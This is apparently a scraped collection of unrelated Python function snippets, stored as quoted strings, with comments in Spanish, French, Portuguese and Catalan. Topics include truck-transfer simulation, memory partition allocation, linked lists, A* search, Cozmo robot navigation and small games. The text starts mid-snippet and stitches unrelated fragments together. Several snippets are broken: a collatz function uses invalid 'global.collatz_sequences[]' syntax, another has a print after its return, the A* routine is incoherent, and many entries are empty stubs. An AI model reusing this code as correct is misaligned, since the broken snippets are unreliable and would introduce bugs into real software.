espera_transbordo_o_interrumpe(self, sistema, tespera=float(\"Inf\")): # TODO Cambiar de nombre\r\n\r\n if self.tipo == \"Carga\":\r\n tipo_camion_en_esp = \"Descarga\"\r\n else:\r\n tipo_camion_en_esp = \"Carga\"\r\n\r\n # Si hay un camion esperando con el que se puede realizar un transbordo, se 
interrumpe su espera\r\n if len(sistema.colas_espera_transbordo[self.carga][tipo_camion_en_esp]) != 0:\r\n\r\n print str(self) + \" Interrumpe espera - Hora: \" + str(sistema.now)\r\n self.transbordo = \"Si\"\r\n camion_en_espera = sistema.colas_espera_transbordo[self.carga][tipo_camion_en_esp][0][0]\r\n espera_en_proceso = sistema.colas_espera_transbordo[self.carga][tipo_camion_en_esp][0][1]\r\n\r\n self.interrumpe_espera_transbordo(espera_en_proceso)\r\n\r\n sistema.colas_espera_transbordo[self.carga][tipo_camion_en_esp].pop(0) # TODO revisar\r\n camion_interrumpido = camion_en_espera\r\n\r\n self.manipulado.succeed()\r\n yield camion_interrumpido.manipulado\r\n\r\n sistema.exit({\"Resultado\": \"Interrumpio espera\", \"Interrupcion\": None})\r\n\r\n # Si no hay camiones esperando entonces el camion espera\r\n else:\r\n\r\n espera_transbordo = sistema.process(self.espera_transbordo(sistema, tespera))\r\n sistema.colas_espera_transbordo[self.carga][self.tipo].append([self, espera_transbordo])\r\n\r\n resultado_espera = yield espera_transbordo\r\n\r\n # Si el camion concluyo la espera, sale de la cola\r\n if resultado_espera[\"Resultado\"] == \"Termino espera\":\r\n sistema.colas_espera_transbordo[self.carga][self.tipo].pop(0) # TODO revisar\r\n\r\n sistema.exit(resultado_espera)", "def primer_ajuste(memoria, procesos):\n\n no_colocados = [] # Procesos que no se pudieron colocar en la memoria\n\n for proc in procesos:\n exito = False\n \n for part in memoria:\n if part[1] == None and part[0] >= proc[1]:\n part[1] = proc[0]\n exito = True\n break\n\n if not exito:\n no_colocados.append(proc[0])\n\n return memoria, no_colocados", "def transition(self,schedule):\n\t\tc_p = self.validSchedule(schedule)[1]\n\t\trow = c_p[1]\n\t\tstart = c_p[0][0]\n\t\tc = c_p[0][1]\n\t\tspace = c.length\n\t\tstart_new = start\n\t\tfor i in range(19):\n\t\t\ttry:\n\t\t\t\tif schedule.w[row][start-i-1] == None:\n\t\t\t\t\tspace += 1\n\t\t\t\t\tstart_new -= 1\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\t\t\texcept IndexError:\n\t\t\t\tbreak\n\t\tfor i in range(19):\n\t\t\ttry:\n\t\t\t\tif schedule.w[row][start+i+1] == None:\n\t\t\t\t\tspace += 1\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\t\t\texcept IndexError:\n\t\t\t\tbreak\n\n\t\tfor i in range(len(schedule.w)):\n\t\t\tj = 0\n\t\t\twhile j < len(schedule.w[i]) and (j<start or j>start+c.length):\n\t\t\t\tif schedule.w[i][j] != None and schedule.w[i][j][1].length\\\n\t\t\t\t <=space and schedule.w[i][j][1].id!=c.id\\\n\t\t\t\t and c.length<=schedule.w[i][j][1].length:\n\t\t\t\t\ttemp = i,j,schedule.w[i][j][1]\n\t\t\t\t\tschedule.delContent(temp[0],temp[1],temp[2])\n\t\t\t\t\t#print \"add,\",c\n\t\t\t\t\tschedule.addContent(temp[0],temp[1],c)\n\t\t\t\t\tschedule.delContent(row,start,c)\n\t\t\t\t\t#print \"add,\",temp[2]\n\t\t\t\t\tschedule.addContent(row,start_new,temp[2])\n\t\t\t\telif schedule.w[i][j] == None:\n\t\t\t\t\tj += 1\n\t\t\t\telse:\n\t\t\t\t\tj += schedule.w[i][j][1].length\n\t\treturn schedule", "def sequencial_cartao(self):\n return self._sequencial_cartao", "def avanzar(self):\n\t\tif (not len(self.lista)) or (self.esta_al_final()): \n\t\t\traise StopIteration(\"Esta al final.\")\n\t\tself.pila_anteriores.apilar(self.anterior)\n\t\tself.anterior = self.actual\n\t\tself.actual = self.actual.prox\n\t\tself.posicion += 1\n\t\treturn self.actual.dato", "def cellules(self): # itérateur rendu safe\n cellule_courante = self.tete\n while cellule_courante is not None:\n cellule_suivante = cellule_courante.suivant # sauvegarde\n yield cellule_courante\n cellule_courante = 
cellule_suivante # récupération de la sauvegarde", "def arranca(self):\n \n if self.t0 == None:\n self.t0 = self.timeFunc()\n self.funciona = True\n if not self.funciona:\n self.retraso += self.timeFunc() - self.parada\n self.funciona = True", "def sequencia_nao_utilizada(self, serie, sequencia_utilizada):\r\n # python /u1/caixa/nfce.py -p listagem -n 1 300 -s 80 -ib 1\r\n\r\n sequencia_utilizada = sorted(sequencia_utilizada)\r\n inicial = sequencia_utilizada[0]\r\n final = sequencia_utilizada[-1] + 1\r\n\tdic = collections.Counter(sequencia_utilizada)\r\n\tnotas_nao_utilizadas = [i for i in range(inicial, final) if dic[i] == 0]\r\n \r\n nova_listagem = []\r\n for nota in notas_nao_utilizadas:\r\n dnot = {}\r\n dnot[\"docsitcodigo\"] = 999 \r\n dnot[\"descricao\"] = \"Sequencia nao utilizada\"\r\n\t dnot[\"docnumero\"] = nota\r\n dnot[\"docserie\"] = serie\r\n\t nova_listagem.append(dnot)\r\n return nova_listagem", "def establecerSeccion(self, cuentas, unaSeccion):\n for unaCuenta in cuentas :\n unaCuenta.seccion = unaSeccion\n self.almacen.commit()", "def collatz(start):\n n = start\n\n collatz_sequence = [n]\n\n while global.collatz_sequences.key().contains(n):\n if n % 2 == 0:\n n = n // 2\n else:\n n = 3 * n + 1\n\n collatz_sequence.append(n)\n\n global.collatz_sequences[]\n\n return collatz_sequence", "def __init__(self, mot):\n premiere_cellule = None\n self.taille = 0\n for lettre in reversed(mot):\n premiere_cellule = Cellule(lettre, premiere_cellule)\n self.taille += 1\n self.tete = premiere_cellule", "def aestrella(inicio,obj):\n nodos_abiertos=[inicio]\n nodos_cerrados=[]\n lista1=[]\n for cel in nodos_abiertos:\n lista1.append(cel.costo)\n m=min(lista1)\n for j in nodos_abiertos:\n j.set_gscore(g(inicio,j))\n j.set_hscore(h(j,obj))\n j.set_fscore(f(inicio,obj))\n if j.fscore==m:\n if j==obj:\n print'terminado'\n nodos_cerrados.append(j)\n else:\n nodos_abiertos.append(j)\n for k in j.vecinos:\n if k in nodos_cerrados :\n gk=k.gscore\n gk1=k.get_gscore()\n if gk1<=gk:\n k.set_gscore=gk1\n j=k\n else:\n pass\n elif k in nodos_abiertos:\n gk=k.gscore\n gk1=k.get_gscore\n if gk1<=gk:\n k.set_gscore=gk1\n j=k\n else:\n pass\n \n else:\n nodos_abiertos.append(k)\n k.set_gscore()\n else:\n pass\n ruta=[] \n for u in nodos_cerrados:\n lnc=len(nodos_cerrados)\n for v in range(lnc):\n ruta.insert(v,nodos_cerrados[lnc-v])\n return ruta", "def get_one_order():", "def get_successor(self):\n return None", "def backm(self,numero):\n try:\n for x in range(numero):\n self.tiempos.anterior()\n except StopIteration:\n return", "def conclusion_echantillon(self, liste_foetus):\n compteur = 0\n for lignes in range(1, len(liste_foetus)):\n if liste_foetus[lignes].contamination != 0 and liste_foetus[lignes].taux > self.seuil_taux_conta:\n compteur = compteur + 1\n if compteur > self.seuil_nbre_marqueurs:\n self.conclusion = 1\n else:\n self.conclusion = 0", "def first(self):", "def cozmoBehavior(robot: cozmo.robot.Robot):\r\n \r\n global grid, stopevent\r\n #robot.pose = Pose(0,0,0,angle_z = degrees(0))\r\n scale = grid.getScale()\r\n start = grid.getStart()\r\n #print(\"Start %i,%i\",start[0],start[1])\r\n #print(\"Scale %i\",scale)\r\n #print(robot.pose)\r\n pose = cell_to_pose(start,scale,0)\r\n #print(pose)\r\n robot.go_to_pose(cell_to_pose(start,scale,0)).wait_for_completed()\r\n cubes_seen = set()\r\n while not stopevent.is_set():\r\n cube = None\r\n count = 0\r\n while(cube is None):\r\n try:\r\n cube = robot.world.wait_for_observed_light_cube(timeout=1)\r\n except Exception:\r\n 
robot.turn_in_place(cozmo.util.degrees(15)).wait_for_completed()\r\n count += 1\r\n if count >= 6:\r\n start = (start[0]+1,start[1]+1)\r\n grid.setStart(start)\r\n robot.go_to_pose(cell_to_pose(start,scale,0)).wait_for_completed()\r\n count = 0\r\n \r\n cubes_seen.add(cube.cube_id)\r\n finalanlge = cube.pose.rotation.angle_z.degrees\r\n robot.say_text(\"I see the cube\").wait_for_completed()\r\n #print(cube.pose)\r\n block = pose_to_cell(cube.pose,scale)\r\n grid.addObstacle(block)\r\n finish = get_finish_from_pose(cube.pose,scale)\r\n grid.addGoal(finish)\r\n astar(grid,heuristic)\r\n \r\n \r\n newpath = True\r\n while newpath:\r\n newpath = False\r\n path = grid.getPath()\r\n last = path[0]\r\n for i in range(len(path)):\r\n angle = 0\r\n if i+1 < len(path):\r\n angle = get_angle(path[i],path[i+1])\r\n robot.go_to_pose(cell_to_pose(path[i],scale,angle)).wait_for_completed()\r\n newcube = None\r\n try:\r\n newcube = robot.world.wait_for_observed_light_cube(timeout=1)\r\n except Exception:\r\n print(\"don't do anything\")\r\n if newcube is not None and newcube.cube_id not in cubes_seen:\r\n cubes_seen.add(newcube.cube_id)\r\n robot.say_text(\"I found a new cube\").wait_for_completed()\r\n grid.setStart(path[i])\r\n grid.addObstacle(pose_to_cell(newcube.pose,scale))\r\n grid.clearPath()\r\n grid.clearVisited()\r\n astar(grid,heuristic)\r\n newpath = True\r\n break\r\n \r\n if not newpath:\r\n robotangle = robot.pose.rotation.angle_z.degrees\r\n robot.turn_in_place(cozmo.util.degrees(finalanlge-robotangle)).wait_for_completed()\r\n break\r\n stopevent.set()", "def complementary_seq(self):\n if not self.data['DNAseq']:\n self.complement_seq_var.set(0)\n self.warning('No DNA sequence loaded','You have to load a DNA sequence first')\n return\n compl={'A':'T','T':'A','C':'G','G':'C'}\n comDNA=''\n for base in self.data['DNAseq']:\n comDNA=comDNA+compl[base]\n self.data['DNAseq']=comDNA\n\n # Update\n self.update_sequence_window()\n return", "def test_un_compte_est_creer_avec_solde_nul(self):\n\t\tcompte=Compte()\n\t\tself.assertEqual([0.0], compte.solde)", "def finished(self):", "def set_crecimiento(self):\n return self.write({'state': 'Crecimiento'})", "def entre_primeros_cola_recurso(self, recurso):\r\n\r\n if self in recurso.cola[0:recurso.capacity]:\r\n return True\r\n else:\r\n return False", "def Lluiteu(self) -> IResultList:\n\n if len(self._Lluitadors) != 2:\n print(\"ERROR. Falten lluitadors\")\n exit\n\n elQuePica = randint(0, 1)\n\n while self._Lluitadors[0].es_Ko() == False and self._Lluitadors[1].es_Ko() == False:\n elQueRep = (elQuePica+1) % 2\n proteccio = self._Lluitadors[elQueRep].get_Lluitador().Protegeix()\n pica = self._Lluitadors[elQuePica].get_Lluitador().Pica()\n\n if pica in proteccio:\n self._Lluitadors[elQueRep].treu_vida()\n print(\n f'{self._Lluitadors[elQueRep].get_nom()} rep un cop al {pica.name} de {self._Lluitadors[elQuePica].get_nom()}')\n else:\n print(\n f'{self._Lluitadors[elQueRep].get_nom()} atura el cop al {pica.name} de {self._Lluitadors[elQuePica].get_nom()}')\n elQuePica = elQueRep\n\n guanyador = next(x for x in self._Lluitadors if x.es_Ko() == False)\n perdedor = next(i for i in self._Lluitadors if i.es_Ko() == True)\n\n comentariLocutor = \"\"\n\n if (guanyador.get_vida() - perdedor.get_vida()) > 5:\n comentariLocutor = \"Quina pallissa!!\"\n\n print(f\"{perdedor.get_nom()} cau a terra!\")\n print(f\"VICTÒRIA DE {guanyador.get_nom()}!!! 
{comentariLocutor}\")\n\n return self._Lluitadors", "def add_couche(self, pos):\n if self.control == 0:\n if pos >= 0 and pos < (self.couche):\n self.couche.insert(pos, 0)\n else:\n print(\"Vous pouvez ajouter une couche dans l'intervale [0,\" + str(len(self.couche)) + \"]\")\n else:\n print(\"Le réseau est deja créé, vous en pouvez plus le modifier\")", "def collatz(n):\n sequence = []\n\n while n != 1:\n if n > 1:\n sequence = sequence + [n]\n n = collatz_step(n)\n elif n < 1:\n n = collatz_step(n)\n sequence = sequence + [n]\n break\n if n == 1:\n sequence = sequence + [n]\n return sequence\n print sequence", "def agentbehavior1(cola):\n # Registramos el agente\n gr = register_message()\n\n # Escuchando la cola hasta que llegue un 0\n fin = False\n while not fin:\n while cola.empty():\n pass\n v = cola.get()\n if v == 0:\n fin = True\n else:\n print v\n\n # Selfdestruct\n #requests.get(InfoAgent.stop)", "def agentbehavior1(cola):\n # Registramos el agente\n gr = register_message()\n\n # Escuchando la cola hasta que llegue un 0\n fin = False\n while not fin:\n while cola.empty():\n pass\n v = cola.get()\n if v == 0:\n fin = True\n else:\n print v\n\n # Selfdestruct\n #requests.get(InfoAgent.stop)", "def cliquer(self):\n self.nb_clic += 1\n self.message[\"text\"] = \"Vous avez cliqué {} fois.\".format(self.nb_clic)", "def mark_add_prev(self,duracion):\n if not self.tiempos.posicion_actual():\n self.mark_add(duracion) # Si se encuentra en la posicion inicial no hay marca previa\n return\n mark = MarcaDeTiempo(duracion)\n self.tiempos.insert(self.tiempos.posicion_actual()-1, mark)\n self.tiempos.actualizar()", "def insere(self, no):\n y = None\n x = self.getRaiz()\n while x is not None:\n y = x\n if no.getChave() < x.getChave():\n x = x.getEsquerdo()\n else:\n x = x.getDireito()\n no.setPai(y)\n if y is None:\n self.setRaiz(no)\n elif no.getChave() < y.getChave():\n y.setEsquerdo(no)\n else:\n y.setDireito(no)", "def first(self):\n if self.is_empty():\n raise Empty(\"Deque está vacío\")\n return self._header._next._element # un artículo real justo después de la cabecera", "def _finish_element(self):\n assert self.currentelem.indexend is True\n self.currentelem.indexend = self._parser.CurrentByteIndex + self.baseposition\n self.currentelem = self.currentelem.parent", "def select_next_cup(self):\n idx = self.current_cup_idx()\n idx += 1\n if idx >= len(self.cups):\n idx = 0\n self.current_cup = self.cups[idx]", "def ubicar_submarino(): #esta clase de barcos no tiene orientacion\n tamano = Submarinos.tamano #se importa el tamano del barco desde su clase\n cantidad = Submarinos.cantidad #se importa la cantidad de barcos desde su clase\n while cantidad > 0:\n mal_ubicado = \"no\"\n coor_fila = randint(1,numero_filas)\n coor_columna = randint(1,numero_columnas)\n ubicacion = (coor_fila, coor_columna)\n for x in lista_ubicacion_barco:\n if x == ubicacion:\n mal_ubicado = \"si\"\n #validacion para que los barcos no queden contiguos entre otros ya posicionados\n elif (ubicacion[0] == x[0] or (ubicacion[0]+1) == x[0] or (ubicacion[0]-1) == x[0]) and ((ubicacion[1]) == x[1] or (ubicacion[1]+1) == x[1] or (ubicacion[1]- 1) == x[1]): \n mal_ubicado = \"si\"\n if mal_ubicado == \"no\":\n cantidad -= 1 #se resta uno a la cantidad de los barcos porque ya este se posiciono correctamente\n lista_ubicacion_barco.append(ubicacion) #si el barco no es contiguo con ningun otro barco se agrega a la lista de los barcos ya posicionados\n elif mal_ubicado == \"si\":\n cantidad = cantidad #la cantidad de barcos se 
mantiene igual porque el barco quedo contiguo a otro, se repite el proceso d eubicacion para este barco", "def transact(self):", "def transact(self):", "def colocar_especial(tablero_juego, filas, columnas, especiales_nivel, datos_de_especiales, obstaculos, posicion_fruta, posicion_serpiente):\n color_normal = '\\033[0m'\n color_azul = '\\033[34m'\n especial_colocado = choice(especiales_nivel)\n especial = datos_de_especiales[especial_colocado]\n while True:\n posicion_especial = [randint(0, filas-1), randint(0, columnas-1)]\n if not any((esta_contenido_o_igual(posicion_especial, obstaculos), \n esta_contenido_o_igual(posicion_especial, posicion_serpiente), \n esta_contenido_o_igual(posicion_especial, posicion_fruta))): break\n tablero_juego[posicion_especial[0]][posicion_especial[1]] = color_azul + especial_colocado + color_normal\n return posicion_especial, especial_colocado", "def joueCoup(position,coup):\n nouvelle_pos = clonePosition(position) # on duplique pour ne pas modifier l'original\n n = nouvelle_pos['taille']\n trait = nouvelle_pos['trait']\n # on transforme coup en indice\n if trait == 'SUD':\n indice_depart = coup-1\n else:\n indice_depart = 2*n-coup\n # retrait des graines de la case de depart\n nbGraines = nouvelle_pos['tablier'][indice_depart]\n nouvelle_pos['tablier'][indice_depart] = 0\n # on seme les graines dans les cases a partir de celle de depart\n indice_courant = indice_depart\n while nbGraines > 0:\n indice_courant = (indice_courant + 1) % (2*n)\n if (indice_courant != indice_depart): # si ce n'est pas la case de depart\n nouvelle_pos['tablier'][indice_courant] += 1 # on seme une graine\n nbGraines -= 1\n # la case d'arrivee est dans le camp ennemi ?\n if (trait == 'NORD'):\n estChezEnnemi = (indice_courant < n)\n else:\n estChezEnnemi = (indice_courant >= n)\n # realisation des prises eventuelles\n while estChezEnnemi and (nouvelle_pos['tablier'][indice_courant] in range(2,4)):\n nouvelle_pos['graines'][trait] += nouvelle_pos['tablier'][indice_courant]\n nouvelle_pos['tablier'][indice_courant] = 0\n indice_courant = (indice_courant - 1) % (2*n)\n if (trait == 'NORD'):\n estChezEnnemi = (indice_courant < n)\n else:\n estChezEnnemi = (indice_courant >= n)\n # mise a jour du camp au trait\n if trait == 'SUD':\n nouvelle_pos['trait'] = 'NORD'\n else:\n nouvelle_pos['trait'] = 'SUD'\n return nouvelle_pos", "def placaLliure():\n lliures = []\n con = lite.connect('parking.db')\n cur = con.cursor()\n try:\n cur.execute(\"SELECT placa FROM parking ORDER BY placa ASC\")\n rows = cur.fetchall()\n for row in rows:\n lliures.append(row[0])\n print lliures\n for i in range(1,len(lliures)+1):\n if i != lliures[i-1]:\n result= i\n break\n except lite.IntegrityError:\n pass\n con.close()\n return result", "def complete(self): #lol\n self.fix_rotation()\n return self", "def __init__(self):\n mi_parqueo = list()", "def classificar(self, referencia):\n distancia_minima = distancia_euclidiana(referencia, self.lista[0][0], 3)\n posicao = [0,0]\n\n for y in range(self.altura):\n for x in range(self.largura):\n distancia = distancia_euclidiana(referencia, self.lista[x][y], 3)\n if distancia < distancia_minima:\n distancia_minima = distancia\n posicao = [x,y]\n\n return posicao", "def atender(self):\n\n if self.enfila>0:\n \n self.enfila-=1\n self.fila.pop(0)", "def test_obtener_lista_ciudades_transformadas_vacia(self):\n lista = []\n lista_transformada = CIUDADES_CONTROLLER.obtenerListaCiudades(lista)\n self.assertEqual(len(lista_transformada), len(lista))", "def resoudre(self):\n 
#crée la root du noeud\n #collections.deque est un conteneur comme une liste qui permet\n # des ajouts et des retraits rapides à chaque extremité\n queue = collections.deque([Node(self.start)])\n #vu représente les noeuds déjà croisés\n vu = set()\n vu.add(queue[0].state)\n while queue:\n #le noeud qui ressort dépend du score (h+g vu précédemment),\n queue = collections.deque(sorted(list(queue), key=lambda node: node.f))\n # on prend le score le plus faible pour se rapprocher du but avec un score de 0\n node = queue.popleft()\n #on vérifie s'il est égal à l'état du but c'est à dire le taquin = [1,2,3,4,5,6,7,8,0]\n if node.resolu:\n return node.chemin\n\n #si ce n'est pas l'état du but on regarde les différents noeuds enfants possibles\n # en faisant toutes les directions ( haut, bas, gauche, droite)\n for deplacement, action in node.actions:\n child = Node(deplacement(), node, action)\n\n if child.state not in vu:\n #on ajoute le noeud enfant à la queue\n queue.appendleft(child)\n vu.add(child.state)", "def composantesConnexes(modele):\n \n num_composantes = {}\n liste_sommets = modele.getListeSommets()\n compteur_comp = 1\n \n for x in liste_sommets :\n # si x n'a pas de numéro, lancer un parcours...\n if x not in num_composantes :\n attente = deque([x])\n num_composantes[x] = compteur_comp\n modele.addTexte(x,compteur_comp)\n while attente:\n courant = attente.pop()\n for vois in modele.getVoisins(courant):\n if not vois in num_composantes:\n attente.append(vois)\n num_composantes[vois] = compteur_comp\n modele.addTexte(vois,compteur_comp)\n \n compteur_comp += 1\n modele.observateur.update()", "def mejor_ajuste(memoria, procesos):\n\n no_colocados = [] # Procesos que no se pudieron colocar en la memoria\n\n for proc in procesos:\n exito = False\n menor_desperdicio = None # Posición de la partición que produce menor\n # desperdicio.\n \n for part in memoria:\n if part[1] == None and part[0] >= proc[1]:\n if menor_desperdicio == None:\n menor_desperdicio = memoria.index(part)\n elif part[0] - proc[1] < memoria[menor_desperdicio][0] - proc[1]:\n menor_desperdicio = memoria.index(part)\n\n exito = True\n\n if exito:\n memoria[menor_desperdicio][1] = proc[0]\n else:\n no_colocados.append(proc[0])\n\n return memoria, no_colocados", "def agregar_bolsa(self, letra, cantidad):", "def uniformCostSearch(problem):\n #Teremos uma fila só que cada elemento da fila recebe uma prioridade como uma fila de banco\n \"*** YOUR CODE HERE ***\"\n marcado = set()\n fila = util.PriorityQueue()\n fila.push((problem.getStartState(), []),0)\n while not fila.isEmpty():\n pos, movimento = fila.pop()\n if problem.isGoalState(pos):\n return movimento\n if pos in marcado:\n continue\n marcado.add(pos)\n candidatos = problem.getSuccessors(pos)\n for candidato, acao, custo in candidatos: #agora adicionaremos a prioridade no push\n prioridade_do_candidato = problem.getCostOfActions(movimento+[acao])\n print(prioridade_do_candidato)\n fila.push((candidato, movimento + [acao]), prioridade_do_candidato)\n\n return []", "def atencion_ingreso(self, camion):\r\n\r\n operaciones = self.operaciones[\"Operaciones complementarias\"]\r\n\r\n if camion.tipo == \"Descarga\":\r\n yield self.process(operaciones[\"Atencion recepcion 1\"]\r\n .ejecutar(self, camion))\r\n else:\r\n yield self.process(operaciones[\"Atencion despacho 1\"]\r\n .ejecutar(self, camion))\r\n\r\n if camion.carga not in [\"Contenedor 20\", \"Contenedor 40\"] and \\\r\n not (camion.tipo == \"Carga\" and camion.carga == \"Harina de Soya - Hi Pro/Pellet de 
Soya\"):\r\n yield self.process(operaciones[\"Primer pesaje\"]\r\n .ejecutar(self, camion))\r\n self.exit(camion.nombre)", "def getNext(self):", "def setSeqElementWaiting(self,SequenceIndex=1,State=1):#TODO implement stringonly\n\n if (State!=0):\n self.sendMessage(\"SEQuence:ELEMent\"+str(SequenceIndex)+\":TWAit 1\")\n else:\n self.sendMessage(\"SEQuence:ELEMent\"+str(SequenceIndex)+\":TWAit 0\")", "def __init__(self):\n\n self.sequence = []", "def test_CONT_pass(self):\n for O in self.mod.objts.itervalues():\n for C in O.conts.itervalues():\n self.assertTrue(C.isset)", "def finTour(self):\n print(\"fin du tour\")\n self.etat = \"Fin\"\n if self.joueurActif.nbRessource + self.joueurActif.getNbRessourceTour() <= self.joueurActif.nbMaxRessource :\n self.joueurActif.nbRessource += self.joueurActif.getNbRessourceTour()\n else:\n self.joueurActif.nbRessource = self.joueurActif.nbMaxRessource\n print(self.joueurActif.nbRessource)\n if self.joueurActif == self.joueur1:\n self.joueurActif = self.joueur2\n print(\"Au joueur 2 de jouer\")\n else:\n self.joueurActif = self.joueur1\n print(\"Au joueur 1 de jouer\")\n for iEntite in self.joueurActif.entiteResetDeplacement:\n iEntite.setMoove(True)\n for iEntite in self.joueurActif.entiteResetCombat:\n iEntite.setCanAttack(True)\n \n if self.joueur1.nbRessource >= 2000:\n print(\"FIN DE LA PARTIE LE JOUEUR 1 A GAGNER\")\n if self.joueur2.nbRessource >= 2000:\n print(\"FIN DE LA PARTIE LE JOUEUR 2 A GAGNER\") \n \n self.etat = \"En jeu\"", "def done(self):", "def done(self):", "def cont(self):\n return True", "def get_next_if_any(self):\n try:\n ret = self.work[deepcopy(self.i)]\n self.i += 1\n # print \"Trickling item\", self.i\n return ret\n except Exception:\n return None", "def es_satisfecho_por(self, candidata):", "def esta_abierta(self):\r\n self.actualizar_estado_actividad()\r\n return self.estado != 'Cerrada'", "def task3(self):\n\n pass", "def main():\n\n # on affiche la liste des cartes disponibles\n liste_des_cartes = functions.liste_cartes() + functions.liste_sauvegardes()\n functions.afficher_liste(liste_des_cartes)\n\n # selection d'une carte, un retour \"None\" indique une mauvaise saisie\n while True:\n choix = functions.choix_carte(\n input('''Indiquez le numéro de la carte choisie.\n Attention, si vous choisissez une nouvelle partie, la sauvegarde associée\n à la carte concernée sera remplacée. 
\\n'''), liste_des_cartes)\n if choix is not None:\n break\n\n # la carte est choisie, on peut générer un Labyrinthe\n laby = Labyrinthe(choix)\n # on affiche le tracé du labyrinthe\n print(laby.carte)\n\n # on lance la boucle du jeu\n while True:\n deplacements = input(\"\"\"Dans quelle direction voulez vous aller?\n \"E\" pour aller vers l'est, \"N\" pour aller vers le nord\n \"S\" pour aller vers le sud, \"O\" pour aller vers l'ouest\n Suivi d'un nombre (optionnel) pour le nombre de cases à parcourir\n \"Q\" pour sauvegarder et quitter\n \"\"\")\n # on vérifie que les données entrées par l'utilisateur sont valides\n instructions = functions.instructions_valide(deplacements)\n if instructions is not None:\n\n if instructions == \"quitter\":\n laby.sauvegarder_partie()\n break\n if instructions == \"lettre non valide\":\n print(\"La lettre entrée n'est pas valide \\n\")\n continue\n if instructions == \"non valide\":\n print(\"Les données entrées ne sont pas valides \\n\")\n continue\n else:\n # on vérifie si la partie est toujours active\n partie_en_cours = laby.effectuer_deplacements(instructions)\n if not partie_en_cours:\n # en cas de sortie trouvée, on supprime la sauvegarde\n laby.supprimer_partie()\n print(\"Partie terminée, sauvegarde supprimée\")\n break\n\n # On met en pause le système (Windows)\n os.system(\"pause\")", "def abrir(self):\n assert self.open == False\n self.ne = [n for n in self.ne]\n self.je = [e1 for e1 in self.je]\n self.ie = []\n self.open = True", "def _is_finish(self, pos):\r\n return self.course[pos[0], pos[1]] == 2", "def lateral_vazio_8(tab, jog):\r\n for x in [2,4,6,8]:\r\n if eh_posicao_livre(tab,x):\r\n return x", "def start(self):\n\n self.ihm.log(['On attaque la boucle infinie'])\n\n while 1:\n\n # 1. afficher le jeu\n self.ihm.afficherJeu()\n\n if self.ihm.utilisateurQuitte(): self.stop()\n\n # 2. attendre un mouvement\n # 3. IHM nous file la direction\n mouv = self.ihm.mouvement()\n\n if self.ihm.utilisateurQuitte(): self.stop()\n\n # 4. on demande à la map si c'est OK\n # 5. on fait buoger le joueur si OK\n\n #juste pour faciliter l'accès\n x = self.joueur.x\n y = self.joueur.y\n if mouv == \"haut\":\n if self.map.case_libre(x, y-1):\n self.joueur.haut()\n else: continue\n elif mouv == \"droite\":\n if self.map.case_libre(x+1, y):\n self.joueur.droite()\n else: continue\n elif mouv == \"bas\":\n if self.map.case_libre(x, y+1):\n self.joueur.bas()\n else: continue\n elif mouv == \"gauche\":\n if self.map.case_libre(x-1, y):\n self.joueur.gauche()\n else: continue\n else:\n pass # quitter le jeu\n\n # on retire 1 au compteur de pas\n self.pas_pour_monstre -= 1\n\n # 6.1. monstre ?\n if not self.pas_pour_monstre:\n self.ihm.log([\"C'est l'heure du monstre\"])\n\n # 7.1. on l'instancie\n monstre = self.spawn_monstre()\n\n # 8.1. on génère un combat\n combat = Combat(self.joueur, monstre)\n\n # 9.1. on refourgue le combat à l'ihm qui affiche un dialog\n if self.ihm.utilisateurQuitte(): self.stop()\n choix_combat = self.ihm.dialogCombat(combat)\n if choix_combat == 'combattre':\n combat.combat()\n else:\n combat.fuite()\n\n self.ihm.finCombat(combat)\n if self.ihm.utilisateurQuitte(): self.stop()\n self.reinit_pas()\n\n # 6.2. objet ?\n # 7.2. on le récupère/on l'instancie\n # 8.2. on le refourgue à l'IHM qui affiche un dialog\n # 9.2. 
l'user répond et on prend en compte son choix\n self.ihm.log([\"Checks pour les objets\"])\n if self.ihm.utilisateurQuitte(): self.stop()\n self.objet_trouve()", "def update(self):\n\n # Ordenamos los personajes por fila, para luego dibujarlos correctamente. Para que no se solapen.\n self._personajes.sort(self._comparar_coordenadas_personajes)\n\n for personaje in self._personajes:\n if (personaje.andando): # Si está andando.\n # Si el personaje se encuentra en el centro de la celda a donde debia llegar ...\n if (personaje.obtener_coordenadas() == self._mapa.obtener_coordenadas_por_posicion((personaje.camino[0][0], personaje.camino[0][1]),self._mapa.CENTER)): \n del personaje.camino[:1] # Eliminamos esa celda del camino ha seguir porque ya ha llegado a ella. \n if ((personaje.camino == []) or (personaje.camino == None)): # Si ya no queda camino a seguir...\n personaje.parar() # Paramos al Personaje.\n if not(personaje.accion == None): # Si tiene asignada alguna acción después de haber llegado a su destino ...\n personaje.accion() # Ejecutamos la acción\n personaje.accion = None # Y limpiamos la acción\n if (personaje.nombre != \"Jugador\"): # Si el Personaje no es el Jugador establacemos su dirección final.\n personaje.actualizar_direccion(personaje.direccion_final)\n else: # Calculamos la nueva direccion hacia donde tiene que mover\n # Obtenemos la fila y columna donde se encuenta el personaje.\n origen = self._mapa.obtener_posicion_por_coordenadas(personaje.obtener_coordenadas())\n # Establecemos hacia donde tiene que mirar el Personaje para ir en esa dirección.\n personaje.actualizar_direccion(self._mapa.direcciones.index([personaje.camino[0][0] - origen[0], personaje.camino[0][1] - origen[1]]))\n else: # Si el personaje no esa todavia en el centro de la celda \n if (not self._hay_colision(personaje, (personaje.camino[0][0], personaje.camino[0][1]))): # Si no hay colisión en la celda de destino \n personaje.mover(personaje.obtener_direccion()) # Movemos al personaje en esa dirección.\n else: # Si hay colision\n celda_personaje = self._mapa.obtener_posicion_por_coordenadas(personaje.obtener_coordenadas())\n personaje.actualizar_posicion(self._mapa.obtener_coordenadas_por_posicion((celda_personaje[0], celda_personaje[1]),self._mapa.CENTER))\n # Volvermos a calcular una ruta para llegar al destino.\n self.ir_a(personaje, personaje.destino, personaje.direccion_final)\n \n personaje.update() # Actualizamos el personaje.\n \n for objeto in self._objetos: # Actualizamos los objetos.\n objeto.update()\n \n self._dibujar(\n )", "def _get_sequence(self, cursor):\n raise NotImplementedError", "def juego():\n ubicar_naves()\n global disparos_acertados, disparos_efectuados, disparos_elegidos, disparos_fallidos, disparos_repetidos\n #contadores\n disparos_efectuados = 0\n disparos_acertados = 0\n disparos_fallidos = 0\n disparos_repetidos = 0\n puntaje = 0\n for x in usuario_partida:\n usuario = x\n print(\"¿Estas listo para jugar {}? eso espero porque no hay vuelta atras\\nCargando........ 
